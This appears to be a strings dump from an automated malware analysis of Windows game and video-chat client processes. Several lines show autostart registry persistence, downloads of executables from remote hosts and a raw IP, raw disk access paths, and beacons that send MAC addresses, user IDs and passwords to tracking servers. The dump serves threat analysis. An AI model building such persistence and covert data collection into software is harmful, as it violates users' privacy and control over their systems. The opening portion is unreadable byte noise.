CCCWWWHHHFFFOOOIIIOOO???>>>===???666222222222222,,,###---///***999---666===:::AAA:::999===GGGIIIDDD@@@SSSIIIWWWQQQSSSUUUMMMPPPOOOPPPQQQTTTVVVUUUYYYTTTTTTXXXPPPSSSHHHMMMLLLMMMJJJNNNPPPIIINNNKKKUUUUUUOOOFFFHHHAAAXXX^^^RRRRRRFFFLLLFFFHHHOOOSSSYYYVVVaaa
"""???:::
%%ÝD===
***"""!!!
'(&###""")))   
!!!---,,,///"""111---
!000( )$$$222
333)))(((   $$$ ###
%%%,,,###"""
@@@&&&,,,777111
)*(879%%%***...(((
***)))111000)))666%%%&&&---(((
5324120
. -444777###$$$)))   333
...%%%###---''',,,
<<<222!!!$$$
5977777777
)'&/6669;;546    #!&&&444555444222
5"#7022'(6
"(*4- 7* 5342<<<>?=666768
***<=;=;;888&'%
///:::444666"""222888(((%%%
***777000###!!!$$$"""
9;;-.,<:9
(* >=?>=?   
8#$2777444888;;;444(((
>>>777888###
"""%%%***///...   999...111###...)))$$$
:9;:=;=??253111;99&((
777688>=?
;466(&&!!!<<<666
 '&(999===???%%%
666???:::   !!!
"""$$$((())) $$$
&#%''' !!!# "$#
"!#673>:?310
:<=888/0.  9
###444???999:::
111<<<666999,,,
(((999879?>@???#"$
$$$?=<555
755>>>555
98:<<<===%%% 999***
!!)))01/
3648:;555<<<666
!!!<<<666;;;<<<>>>,,,
,,,?<>BBB *, *.DEC215:<<498NPQ897
!!!'''<<<===
=?@546(&&@@@(&&
673HIG%&*&((453<::@>>'(&244>>>444ACC ""$&&GGG76:! "%$&$#V4%%%$$$%%%***IHJKJL---EFDDBAMMM%&"DCE???<<<LLLJJJNLL!## ""HFEILJ342102POK>>>######"""$$$%%ÌC$$$&&&,,,"""#%&888NNNEFDDCEKKK%%%!!!HHHIII   666FFF;;;888&&&===...444DDD???   666666   ...999999333555000...999444@@@RRRNNN
NMO\]YRTUTTTACC')*;<:PNN555WWW)*(666EFD&&&'(&@@@MNLJJJ-,., -888444((((((999333QQQCBD%$&IIIMMMGGG777KKKFFFVWU;8:(')WXVFHI532DCENNN,,,:::KKKPPPJJJ---)))LLLWUUOQQMOOUUU555,,,( )'%%>>>QQQFFFIII,,,&&&%%%...DDDNNN222...>>>999...,,,333666222666@@@444555:::JJJ<<<@@@DDD@@@SSSNNNKKK
JIKEEEEEE```TTTXXXRRR...fff777\\\sss^^^]]]@@@FFFXXXNNN>>>NNNbbbSSS,,,jjjWWW:::444333...///AAA^^^cccWWWddd444fffWWW444;;;IIIZZZ^^^bbbaaaTTT```bbb]]]TTTaaaeee^^^GGGTTTZZZlllOOO000RRRGGGOOO@@@===ddd[[[WWWVVVXXX,,,444UUUHHH^^^LLL;;;QQQOOOTTTNNNMMMHHHFFFgggoookkkuuuJJJDDD
!! """$$#%%
" $)*%* $()(,-!##'))"$$%*)*,-%)*', */.& *.01)-.(-,$)(*/.022,..-/0' ,(**#%%"$$ ""
"%#(**$&& "#(* ,10#('&* ,/3%*) %$!%&& *
#""$$!##
" ""&()#'(#%% %$#%%
!#$&(( 0/59>
& *,9;:?@
$:.66 '$
" '($(')
222???~~~
$$$%%%"""
.-/PRRQTR --%''%''5788::#%&-/0JGI/ *(%'&$$MKJ><<23/"$$QQQ333LMKXYW'''777CEE.,,'%$$!#&&&.1/&&&%!&(&&$#'8::FFF/0.GHFAB@FIG&%'*- AAA;99GEECBD=??<;=!$"./-HHHGEE*((222=??<;=$""
---)))000   )))
0..JJJ@BB
>q!@s$Cx%Dy$By$By#Ax!B
%Cz'Cy-I
Jj.Qs
1!4O%C
!!!###%%
!#$#&$$'%
')))  !##),*$)'$)(#('(,-
$#$)'(- (,-(,-*./*/.054.32165', -21).-"$$
$)((,-"&')-.' ,$)(#('!&%
#(&*/#'(
!"$)*.23.23,01/34 /0/43,10!&%#%%
'4).7#)(%*($&'#%&
"*0/$*).00,216;:
*59)./%$&& *%''
$)**./.32
.OZ^9IV
#*;8=>065& * 0/.00*./-/0389!09
&4,01#%%"'&
07>;&)-%*("!#
!<).1***!&$
7$&&'''#!!
4%*  %$ %$
</34 #!$$$)))
   %%%###"$%
222 ))022@@@5;:
&&&===???FHI.23:?B4BUGUhZh{]m}!%f
...999777>>>444$$$ ACCBDEONPCHI8=>:<<QWVIW]@IkUakFNMRVWTYXCHGSUULQPEJI879>@@V[\RSW5=T6?`UagFKLLQT\a`JUk4=iKXn=@E:?>IKKNRSEKJ213/11EDFQSSHLMQRPPUXFLc-5]FLcRWXSXWMOP;?@5869;;:<<$$$),*-,.GFJMMM26149<
   111<<<AAALLL666DDD===BBBDDD:::<<<   '''""""""/// 222===DDD999 /34OOOFDCACC054BDD@BB?AAKNLHJJHKIGGG659CA@AAA $%IHJ=><,01QON156444MOPJMK355HJJ/12 0.BDDORP*) 213'#(CCCCHFBDDAB@%%%$&&7=<BECEBDCDB8;?=@>=?@&$$#"$>@A<=;%$&126CEE!$"<<<VVV@@@CBD7=<KKK133502HHH<A?222
...///444333999888...   555666   ???DDD333///===&&&888;;;FFF666   IIIGGG! "%''IKLDCEGGGNOM:::'&($$$-.,)&('%îE)'&&$$!## %$&$#@@@QRP342244OKPFGK!#$"'&NNNLKMOMM=<@AB@GEE%&"MMMCDBGGG-,.KKKIHJ,,,&&&%&$(((356*%&&&&
AAA<<<JJJ:::666555@@@666333666333,,,///999???...133NNNFDD...%%%$&&,,,IIIEHFPPPA??%%%'*(*,,546UVTRPPORPUUULLL'*( --JJJPOQKKK8::,,,NMQDDD444HIEYWV)(*;98VVVFFFJJJ777FGEKMNJGI%%ÌCPQO333:9;&((*('533999*,-0..IJHMMMB?A%(&&&&EEE657)(*VVV755NNN9;<)))CDBRTUTTT[^\WRS
#%% %$'''$&&"'& %$%%%"""
'*(&((#%% %$$)(!&%$&&#%%
!!%'(#%&
*,-*/.$)().,',*!$"
%''&&&"""
#%%( ))  /34156.34489).- 0//47)./&* %''%%%
*.3& *!%&
5"),-21,2-5:8
,6=.01'*.(**( )%)*
#!-//(,-6;9
#1022 --"!%
/3<9/34'))
3,./*,, ""
3%.Tn|zert'0U
!=)./*,,
...;;;444777"""222888(((%%%
"""$$$)))///...   999...111###...)))$$$
!!!000<<<666:::,,,
DFGKMMHMLGIILOMRVWVXYUX\RXWRTU;==:<<98:164>BCKPO497<<<NSRDHI:9;7:>7<;5:99>=;@?:?>?DCLQPLQPOTSQQQ489)/./11III?@<) ,& *@CAGLKBFG 0.KMNGIJ*,,BDDCEEBDD   ###<<<---!##8::) ,165;=> -->CBIII=B@DIH<>>&((%%%KKK>>>BBB&&&
134FFFJLL3876;9QPR>CAMMMCHFY\ZACC(-,MMM:<=/0.BDDIII*,-*/.FHHFHHCEEKMMIKLKMNCEF/20.1/HJJJLMJONGIJ%'(0/1&'%MMM;==#%%%%%>@A,,,HFFFHH*,, -.IGG   666BBB
888MJE(')(**657?<>=??( )644>=?165@ED$#%&&&HHH879#"$()'$(#777)))'''''' --JLMMLN111HHHCEELNO$'%DGE????<>PMOKKKOLN#$( #!IGGJLM546120MOO???######"""$$$&&&DDD&&&'&(...$$$&((:;9OPNDFFEDFLLL&&&!!!HHHHHH,,,666FFF;;;888&&&===///444DDD@@@   666666   ...999999333555000...999444@@@RRRNNN
NNN]]]TSUVTT@EC)(*=;:LNN435ZUW ))666EFD&'%%''@@@LLLGJN,,,.,,888444()'()':::333PPPCCC'$&KIILLLHGI675JJJDFFVWU;99)(*WWWHHH326DECPNN,,,:::KKKPPPKKK,,,***LLLSUUSQQQONUUU555, /,*)#%%>>>QQQFFFIII,,,&&&%%%...DDDNNN333...>>>:::...,,,333666222666@@@444555:::JJJ<<<@@@DDD@@@SSSNNNKKK
#!!.,,'#"
"""%%% *,
! %%%)$%% "###$$$-'(><<(&&
$""#! (&&(%'"!#'''*('/ */* 644644
)%$*&%&&&$#%'%%0 *.)(0 , &'.,,422)))
"#!)%$,$$.&&(&%'#",$%'"#.)*,'(*((533666%%%
*$%)$#(%! '& &'#
!%"$ &'/*)1-,0 ,501501(&&
&! )%$'"#,'(*%$$
!%##($#1, 4/.,('0, /--*('.*)
]]]<<<///
)$!%#"&$#.)()$#!
%##)%$,'&-('/*))%$&$$
)))---%%%"""$$$
,('<44 &'
'"!&!  ##&! %! ($#'!"#!!% !&!")$%&"!'#"'#"#
)$#'#")$#)$#$
'#",&'% !"
 643777>>>---&&&
   ...,,,
8222***$$$
'''000,,,---///&&,
%%%   )))"""
2/43<=995:<=;()7
\\\???...
"""%%%$$$
### '&( 03
7867688:;031
0239:8109
; !;356>?;...-  ., 231888./-
310&&&* /317;<:')*
9<:(((76:@@@
<::?>@(&&!
)245:87453
!##$$$)(*
./-0/1/1<
'''$$$###"""
)(*555333<;=
746?=<?>@ !
   :<=999577;8:(&&
302BBB897$#u5CCC#"$!" -  
...BBB?@>#"$
@?A:::231---AAA866-  *')???=??===HEGA@B498:<<%##...EEEFEG)))
333111?>@
***)))000)))---
...MMMQQQAAA555999
((( ))777///
(((;;;79:9;;?=<)'&%%F6FHHLLLBAC310! "KJF879,- IIIBCA"""* )FEGFFFCCCA??897HHHCEE---422CBD9;;333540'%%,**666:::222,- NNNKJLFEG((($#ÌCIII(((QSSGFHDBBWVX,,,)))HHHSSSKKKUVTRRR)''>=?NPPWWW/-- (*   CCCDBB
!!!)))///$$$)))999---555 %%ÌC???HHH444777@@@NNNHHHKKKFFFVVVIIIZZZVVVOOOEEERRRMMMAAA...[[[UUU...___ZZZbbb```ccc000111444---///GGG```[[[...lllgggUUULLLKKKQQQUUUAAAXXX\\\]]]bbb222eee777333ccc:::ZZZ]]]999NNNYYYYYYLLL}}}YYY___pppUUUnnn333
)%$740*%&
"""$$$###
$$$&&&***)))$$$'''---"""((($$$###
 %&3-.5. 8/,7233./<52MDAQHEHD?GB?VNN_VS\PPNEH*$%UOJEA@/-,'"!
$&&#('', (-,,01&* ' ,(-,& *%*)$)("'&#%%
!!"#!"#!
!"...   "$$(** 0/%*)"$$$&&$&&%''
!"$%"%##&$$)($)((* %)**,,%*) ""#('#('')) "##'(
#"!" #&$ ""
"#*./' ,,10*,,$&&) ,*,-#%&
#$(-.',-
*# 8142).-'.1,4;
0165 --"$$
7167(-,&((
)  >@@8@@
,.. --577
(((&((#%% --
""'))387
%%%   )))$$$
[[[???...
((($$$"""$$$
$#644BBBFFF'%ìB#%h9FFFKHJJMK/.0///DHIEGGKMMLKOGLJ@>>PPPDBADCEKII&'%!##NOM999%&*EGG#%&)-.253
" $#%$""!!!
"$ÎE$$$'"#(') /0KHJJIKDDD134311CDB
)))***000))),,,
(((:::9:8:::@=?'(&'%F6FHHKKKBAC111!" KIH689, -GIJCA@ "#,**FFFIHD@BC@=?879IGGGED --022CCC=;;444324%&$***546<:9421(**POQMKKFFF(((%&"ECBGHL%'(USSHIGBBBWUT,,,(((IIIPRSKKKUUUSRT)'&=??POQVVV-., )( *,ACCBAC
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
1(1,10141
5%6X6
2$2(2,202
9 9$9(9,9094989<9
4 4(40484@4
ekernel32.dll
mscoree.dll
KERNEL32.DLL
hXXp://kf.37.com/
hXXp://dts.37.com
hXXp://bbs.37.com/index.php?gid=2447
wd_returnlogin=1
Software\Microsoft\Windows\CurrentVersion\Run
"%s" %s
hXXp://dts.37.com/gonglue/
ErrorUrl
hXXp://gameapp.37.com/controller/client.php?game_id=237&tpl_type=game1
hXXp://d.wanyouxi7.com/37/dts/official/app.ini
hXXp://d.wanyouxi7.com/37/dts/official/Setup_37dts.exe
%Y-%m-%d %H:%M:%S
%Y%m%d%H%M%S
refer=%s&uid=%s&version=%d&installtime=%s&runcount=%d&curtime=%s&showlogintype=3
hXXp://pay.37.com/select.php?gamename=dts&gameserver=%s&username=%s
iconAnimate.exe
@HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
AAdvapi32.dll
LastUpgrade.ini
37LanderUpgrade.exe
Lander.ini
BHTTPDownloader
Content-Type: application/x-www-form-urlencoded; charset=UTF-8;
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\%s\Connection
XXXXXX
QQmenu.exe
Txwu.exe
2006.exe
connetbar.exe
wbc.exe
sunflowerTools.exe
LBSserver.exe
TLnbLdr.exe
DeepinStatus.exe
\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
\SOFTWARE\TyDyy.com
hXXp://a.clickdata.37wan.com/controller/istat.controller.php?item=8133tay6p9&platform=37wan&game_id=%s&ext_1=%d&ext_2=%s&ext_3=%s&ext_4=%s&ext_5=%s&ext_6=%d&browser_type=%d
InstallStat.tmp
ActiveStat.tmp
%Y-%m-%d
hXXp://a.clickdata.37wan.com/controller/istat.controller.php?item=8133tay6p9&platform=37wan&game_id=%s&ext_1=%d&ext_2=%s&ext_3=%s&ext_4=%s&ext_5=%s&ext_6=%d&browser_type=%d&position=%d&ext_7=%s
UninstallStat.tmp
X-X-X-X
\\.\IDE21201.VXD
\\.\PhysicalDrive%d
\\.\Scsi%d:
%Documents and Settings%\%current user%\Application Data\dts\mydts\dts.exe
3.0.0.0
3, 0, 0, 0

iexplore.exe_1768:




%?9-*09,*19}*09
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
IIIIIB(II<.Fg
7?_____ZZSSH%
)z.UUUUUUUU
,....Qym
````2```
{.QLQIIIKGKGKGKGKGKG
;33;33;0
8888880
8887080
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512

9158.exe_2088:




.text
`.rdata
@.data
.rsrc
N SSh
SSh0'
@ SSh`
F SShy
SSSh\
O SSh
W SSh
H SSh
@ SShU
SSSSSSSh
F SSh
<4,$?7/'
(3-!0,1'8"5.*2$
unzip 0.18 Copyright 1998-2002 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
1.1.4
inflate 1.1.4 Copyright 1995-2002 Mark Adler
VERSION.dll
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
?IsControlHaveSkin@CAppSysOperation@@UAEHXZ
?CleanBitmapMem@CAppSysOperation@@UAEHXZ
?LoadBitmapFileToMem@CAppSysOperation@@UAEHPAUHINSTANCE__@@VCString@@PAVCBitmap@@@Z
?LoadBitmapFileToMem@CAppSysOperation@@UAEHPAUHINSTANCE__@@VCString@@@Z
?InitializeOperation@CAppSysOperation@@UAEXPAVCWnd@@@Z
?CleanSkin@CAppSysOperation@@UAEHPAX@Z
?DrawContent@CAppSysOperation@@UAEHPAVCDC@@VCString@@AAVCRect@@H@Z
?AdjustPosition@CAppSysOperation@@UAEHHHHH@Z
?AdjustPosition@CAppSysOperation@@UAEHUtagRECT@@@Z
?DrawSkin@CAppSysOperation@@UAEHPAUtagDRAWITEMSTRUCT@@@Z
?PaintBackGround@CAppSysOperation@@UAEHPAVCDC@@@Z
?CleanUp@CAppSysOperation@@UAEXXZ
?AttachBitmapHadle@CAppSysOperation@@UAEXPAUHBITMAP__@@PAVCBitmap@@@Z
?AttachBitmapHadle@CAppSysOperation@@UAEXPAUHBITMAP__@@@Z
?PreTranslateMessage@CUIButtonTemplate@@MAEHPAUtagMSG@@@Z
?messageMap@CUIButtonTemplate@@1UAFX_MSGMAP@@B
?GetCurrentSkin@CAppSysOperation@@UAEHPAX@Z
?LoadSkin@CAppSysOperation@@UAEHPAX@Z
?FitBitmapSize@CAppSysOperation@@UAEXXZ
?messageMap@CCustomDlg@@1UAFX_MSGMAP@@B
?LoadSkinToBitmap@CAppSysOperation@@SA_NAAVCBitmap@@PAXAA_N@Z
?SetSkinPath@CAppSysOperation@@SAXVCString@@@Z
?GetPictureExEx@CSkinConfContext@@QAEPAXPBDH@Z
?messageMap@CUIDlgTemplate@@1UAFX_MSGMAP@@B
?GetBitmapHeight@CAppSysOperation@@QAEHXZ
?GetBitmapWidth@CAppSysOperation@@QAEHXZ
?GetMessageMap@CUIListCtrlEx@@MBEPBUAFX_MSGMAP@@XZ
MVUILib.dll
MSIMG32.dll
MFC42.DLL
MSVCRT.dll
_acmdln
WinExec
GetCPInfo
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
COMCTL32.dll
ole32.dll
OLEPRO32.DLL
OLEAUT32.dll
WSOCK32.dll
MSVCP60.dll
GdiplusShutdown
gdiplus.dll
publictool.dll
IdleTrac.dll
?WbBase_Login@CWeiboModule@@QAEHHPBD0@Z
?WB_RelationOperation@CWeiboModule@@QAEH_J00HHH@Z
CWeiboClient.dll
NETAPI32.dll
SHLWAPI.dll
WINMM.dll
pdh.dll
9158.exe
?GetPassword@CRoomInfo@@QAE?AVCString@@XZ
?GetPort@CRoomInfo@@QAEHXZ
?SetPassword@CRoomInfo@@QAEXPBD@Z
?SetPort@CRoomInfo@@QAEXH@Z
ItemList/Item[ItemName = '%s']/ItemText
ItemList/Item[ItemID = %d]/ItemText
IDispatch error #%d
FSkinRes\HollSplitter.bmp
SkinRes\VIPRoomSkin\row.bmp
%s\%s
%s9158.exe
chatQK.xml
SkinRes\unlock.bmp
dance_room/dance_coffer.aspx
useridx=%s&userpass=%s&type=1
doid=%d&fromid=%d&stepid=%d
m_lpNormal->CopyHoleDC(%d, 0, %d, %d)
m_lpActive->CopyHoleDC(0, 0, %d, %d)
%e rcRect(%d,%d,%d,%d)
CBmpProgCtrl..........................................%f*%d = %d
//player.ini
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnDocumentComplete: URL="%s"
OnProgressChange: progress=%d, progress_max=%d
OnNavigationComplete2: URL="%s"
OnStatusTextChange: text="%s"
OnTitleChange: text="%s"
\SkinRes\fragment.bmp
active.ini
.PAVCInternetException@@
itemboxconfig.xml
faceconfig.xml
itemconfig.xml
\Fruit\fruit.xml
Banner.xml
filter.zip
serverlist.txt
car.xml
flower.xml
%s,%ld,%d,%d,%d,%d,%s
DownLoad.exe
\SkinRes\waring.bmp
hXXp://img8.9158.com/200808/09/00/25/200808091735989s.jpg
%s(%d)
User32.DLL
SkinRes/DriftingHorn.png
%s&userid=%s&type=%d
\tui_AD.ini
\logincount.ini
UserLogin
ToOpenUrl
GotoWebUrl
OnWebMessageBox
MsgEnterRoom
AppOpenUrl
LoginErrorRoom
PassAdUser
//weibo.ini
div.img50 img { max-width:60px; max-height:60px;
yqh:expression((this.offsetWidth > this.offsetHeight)?
(this.style.width = this.offsetWidth >= 60 ? "60px" : "auto"):
(this.style.height = this.offsetHeight >= 60 ? "60px" : "auto"));
<div class="img50"><img src='%s' /></div></body>
SkinRes\spinbtn_leftright.bmp
SkinRes\flashTab.bmp
SkinRes\flashTabDown.bmp
%d/%d
SkinRes\MoneyTip.bmp
%Y-%m-%d %H:%M:%S %W-%A
%s\*.*
DynamicEffects\LightSticks.db
DynamicEffects\CaiShenImages.db
DynamicEffects\FireworksImages.db
\DynamicEffects.zip
DynamicEffects\DynamicEffects.zip
\\.\PhysicalDrive%d
\\.\Scsi%d:
XXXXXX
X-
Iphlpapi.dll
cugame.9158.com
active/salebag/getinfo.aspx
SkinRes\btn_giftHorn.bmp
SkinRes/bg_giftHorn.png
CityWide_Step1.sysclose
CareFor(t58)_Step1.dancebtn
CareFor(9158)_Step1.freebtn
CareFor(9158)_Step1.makefriendbtn
CareFor(9158)_Step1.songbtn
CareFor(t58)_Step1.freebtn
CareFor(t58)_Step1.makefriendbtn
Favorite_Step1.select_storebtn
.nevernoticebtn
.receive
LoginReceive_
.iknow
.reg_account
QQLogin_
.songbtn
.dancebtn
.freebtn
.makefriendbtn
.sysclose
.closebtn
.select_unstorebtn
.select_storebtn
Guide_%d
\guidestate.ini
WizardDll.dll
public.dll
hXXp://tj.9158.com/qinqinlog.aspx?%s
Lmarkid=%s&Wmarkid=%s&mac=%s&Qinqinumber=%d&useridx=%s&flagmd5=%s
%s%stest0313
%Y-%m-%d
tui.ini
room_regsum.aspx
useridx=%s&nTime=%d&nType=%s
%d$^&&***WEWEE%s
help.xml
sysmessage.xml
skinres\TG\99Lover.xml
ProxyID.ini
promo/promo_installnum_insert.aspx
ip=%s&nType=%s&mac=%s&promoinfo=%s&content=%s
promo/promo_guestnum_insert.aspx
ip=%s&nType=%s&mac=%s&uidx=%s&time=%d&promoinfo=%s&content=%s
&&**WEWEE%s
%sOnlineUpdate.exe %d
UserInfo.xml
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
VideoOut30.ocx
VideoIn30.ocx
9158KTVAudioOut.ocx
9158KTVAudioIn.ocx
ImageOle.dll
login9158.dll
Invoker9158.dll
userinfo.txt
<?xml version="1.0" encoding="GB2312"?>%s
%d%s%s%s
ip=%s&nType=%s&insert=%s&time=%d
EnterRoomURL
9158:%s^|$|^%s
LobbyClient.dll
IMClient.dll
DynamicEffects.dll
lobby.ini
skinres\skin.ini
//HallClose.ini
<MARQUEE ONMOUSEOUT=this.start() ONMOUSEOVER=this.stop() scrollAmount=1 scrollDelay=2 direction=left></MARQUEE></div></body></html>
skinres\Hall\Signal.bmp
skinres\Hall\currentver.bmp
skinres\Hall\SearchRoomBottomRight.bmp
skinres\Hall\SearchRoomBottomLeft.bmp
skinres\Hall\mainietopright.bmp
skinres\Hall\mainietopLeft.bmp
\SkinRes\HallToolbar.bmp
VideoHelper.dll
AudioPort
Port
%s\%d
%s(%s)
Content-Type: application/x-www-form-urlencoded
url=%s
hXXp://room.9158.com/userroom_get.aspx?roomid=%d&useridx=%s
MainUrl->LeaveRoom_Step1.MainUrl=>Url:hXXp://room.9158.com/ktv_new/ktv_tuiinfo.aspx?roomid=%d&&
%s?url=%s
?type=%d
hXXp://VVV.9158.com
hXXp://room.9158.com
&time=%s&viewpa=1
&time=%s&viewpa=2
%d%d%d%d%d%d
/active/userinfor/userview_up.aspx?useridx=%s|viewid=%d
hXXp://cugame.9158.com/active/salebag/getinfo.aspx?id=%s&pwd=%s
LoginCount
LastLoginType
SOFTWARE\9158web
DDVLobby.exe
hXXp://60.191.252.121:8081/DDVGL_Setup.exe
broadcastchat.xml
SkinRes\IM.bmp
face\faceconfig.xml
SendVideoSpaceMsg.aspx
my.9158.com
userid=%s&nickname=%s&roomid=%s
Text->CareFor(9158)_Step1.listen=>Content:%d
&&Text->CareFor(9158)_Step1.talk=>Content:%d
&&Text->CareFor(9158)_Step1.sing=>Content:%d
?aid=%d
sound//msg.wav
<b>%s</b>
<span style="cursor:hand;font-size:13px" OnClick="window.external.MsgEnterRoom('%d')"><b>%d</b></span>
<div style='font-size:14px;padding:5px;color:#104b8f;line-height:25px'>%s <b>%s</b>
%s  
<span style="cursor:hand;font-size:13px" OnClick="window.external.MsgEnterRoom('%d')"><b>%d</b></span></div>
sound//cash.wav
Text->Task_LevelUp.Text1=>Left:85Top:40Content: 
&&Text->Task_LevelUp.Text2=>Left:57Top:65Content: %d
Text->QQLogin_Step1.Account=>Content:%d&&Text->QQLogin_Step1.UserName=>Content:%s&&
GiftHorn.xml
AgentHorn.xml
DriftBroadcast.xml
%d(%s);
Serial:%d
====ItemIndex=%d==&&===ItemNum=%d======
hXXp://room.9158.com/KTV_new/help/help_03.htm#18
<MARQUEE ONMOUSEOUT=this.start() ONMOUSEOVER=this.stop() scrollAmount=2 scrollDelay=2 direction=left>
.Marquee{ height:16px; overflow:hidden;}
.Marquee div{ width:100%; height:16px; padding-top:0px; padding-bottom: 0px;}
active/clicksave/save.aspx
user=%s&level=%d&savet=%d&clickid=%d
MixerXP.dll FAILED
MixerXP.dll
head//star.xml
Head\era.gif
<br><br><div style='font-size:14px;padding:15px'>%s<a href='hXXp://v.9158.com' target='_blank'>
%H:%M:%S
%s\%s.log
hXXp://roommanage.9158.com/active/song_tui/mm_tui.aspx?adstr=%s
hXXp://cugame.9158.com/active/getuserqq/qqinsert.aspx?user=%s&qq=%s&link=%s&stype=ktv
hXXp://room.9158.com/ktv_new/free_mic.aspx?userid=
hXXp://room.9158.com/ktv_new/song_in.aspx?userid=
&r=%d
dance_room_new/click_save.aspx
hXXp://room.9158.com/userroom_add.aspx?roomid=%d&useridx=%s
hXXp://room.9158.com/ktv_new/ktv_tuiroom_in.aspx?parttype=%d
9158.com
tiao58.com
SOFTWARE\t58web
&userid=%s&intype=2&type=%s
&type=%s
<div align=center><img onclick="window.external.FreezeBank(11);" src='
//skinres//Moneyupfreeze.bmp'></div>
//skinres//MoneyRestPass.bmp'> 
<img onclick="window.external.FreezeBank(12);" src='
%d-%d-%d %d:%d
MainUrl->CityWide_Step1.MainUrl=>Url:%s?&&
hXXp://room.9158.com/apps/Activity.ashx?act=8&lastime=%s
%s?user=%s&itype=%d
SkinRes\icon_rt.png
<img src="%s" style="float:right;"/>
</strong></p><p> %s</p>
</strong></p><p> %s<a onclick="window.external.GotoGetGift()"; style="float:right; cursor:hand;">
hXXp://roommanage.9158.com/active/song_tui/code_view.aspx
<html xmlns='hXXp://VVV.w3.org/1999/xhtml'><style type='text/css'>.item { position:relative; float:left; height:167px; margin:10px 15px 25px 0px; width:160px; } .item .bottom_bg, .item .del, .item .del2, .item .hide, .item .hide2, .item .line { display:none; } .item .item_bg { background:#dfefff; border:1px solid #d0e8ff; height:165px; } .lock { position:absolute; left:10px; top:10px; } .item_sel .bottom_bg, .item_sel .del, .item_sel .del2, .item_sel .hide, .item_sel .hide2, .item_sel .line { display:block; } .item_sel .item_bg { height:165px; background:#d9ecff; border:1px solid #b4daff; } .bottom_bg { position:absolute; left:0px; top:165px; width:160px; height:27px; background:#b4daff; } .item .hide, .item .del { position:absolute; left:106px; top:172px; color:#27384e; font-size:14px; text-decoration:none; } .item .del { left:22px; } .item .del2 { position:absolute; left:25px; top:172px; font-size:14px; text-decoration:none; color:#9db8da; cursor:default; } .item .hide2 { position:absolute; left:106px; top:172px; font-size:14px; text-decoration:none; color:#9db8da; cursor:default; } .prev, .next { background:#E7F3FF; border:1px solid #AFD7FF; padding:5px 15px; *padding:5px 15px 4px 15px; color:#004FB6; font-size:14px; text-decoration:none; } .prev2, .next2 { border:1px solid #b7c6d5; color:#8a9fba; cursor:default; }</style><body style='background:#EBF4FF; color:#333; font-size:12px; font-family:arial;'><div style='margin:10px auto 10px; width:99%;'><div><div style='position:relative; z-index:1; background:url(#pic#title_bg.png) repeat-x #c2e0ff; border:1px solid #bee1ff; border-left-color:#b3d7fd; border-right-color:#b3d7fd; border-bottom:none; height:36px; line-height:35px; vertical-align:middle; overflow:hidden;'><div style='position:absolute; z-index:9; left:10px; top:0px; text-align:center; font-size:14px; color:#2D4389; text-decoration:none;'>#sel1#</div><a href="javascript:window.external.OnHistory_Showinfo(1,0)" style='position:absolute; right:10px; padding-left:17px; color:#2D4389; text-decoration:none; background:url(#pic#f5.png) no-repeat 0px 10px;'>
#p6#/#p3# ' onmousemove="this.className='item item_sel'" onmouseout="this.className='item'"><div class='item_bg' onclick='window.external.OnHistory_Showinfo(2,#pa#)'><div class='img' style='position:absolute; left:0px; top:0px;'><img onerror="this.src='#purl#'" src='#p5#' style='border:none;width:160px;height:120px' /></div><div class='lock' style='display:#p4#'><img src='#pic#lock.png' /></div><div class='text' style='position:absolute; left:10px; top:124px;'><p class='name' style='color:#004fb6; padding:2px 0px; margin:0;'>#p2#</p><p style='color:#475465; padding:0; margin:0;'>#p1#</p></div></div><div class='bottom_bg'></div><span class='line' style='position:absolute; left:80px; top:165px; width:1px; height:27px; boder-left:1px solid #a9ccee; background:#a9ccee;'></span><a #p8#>
hXXp://room.9158.com/ktv_new/myroom_del.aspx?userid=%s&roomid=%s&type=%s
%s-%s|
HistoryRoom.xml
hXXp://room.9158.com/ktv_new/lately_room.aspx?r=
hXXp://room.9158.com/ktv_new/cu_myroom.aspx?userid=
href="javascript:window.external.OnHistory_Showinfo(6,#p9#)" class='next '
href="javascript:window.external.OnHistory_Showinfo(5,#p9#)" class='prev '
')){window.external.OnHistory_Showinfo(4,#pa#);}"
\skinres\fav\sel1.gif' style='border:none;'>
hXXp://room.9158.com/images/newten/go-home.gif
#purl#
hXXp://room.9158.com/ktv_new/head1.jpg
class='hide' href="javascript:window.external.OnHistory_Showinfo(3,#pa#)"
\skinres\fav\sel2.gif' style='border:none;'>
iexplore.exe
hXXp://cugame.9158.com/active/app/load.htm
login=
hXXp://VVV.9158.com/client/login/loginback.aspx?
skinres\RankRate.bmp
skinres\Hall\SearchRoomTopRight.bmp
skinres\Hall\SearchRoomTopLeft.bmp
<img width="227" height="67" src="%s">
skinres\Unknown.jpg
skinres\scroll.bmp
\Game\ddvGame.ini
SkinRes//none.bmp
SkinRes\TreeStatus.bmp
SkinRes\Hall\searchRoombtn.bmp
SkinRes\Hall\headbutton.bmp
SkinRes\Hall\MiniInfor.bmp
SkinRes\Hall\bag.bmp
SkinRes\systemCenter.bmp
SkinRes\set.bmp
SkinRes\mybank.bmp
SkinRes\vip.bmp
SkinRes\systemSet.bmp
SkinRes\systemReg.bmp
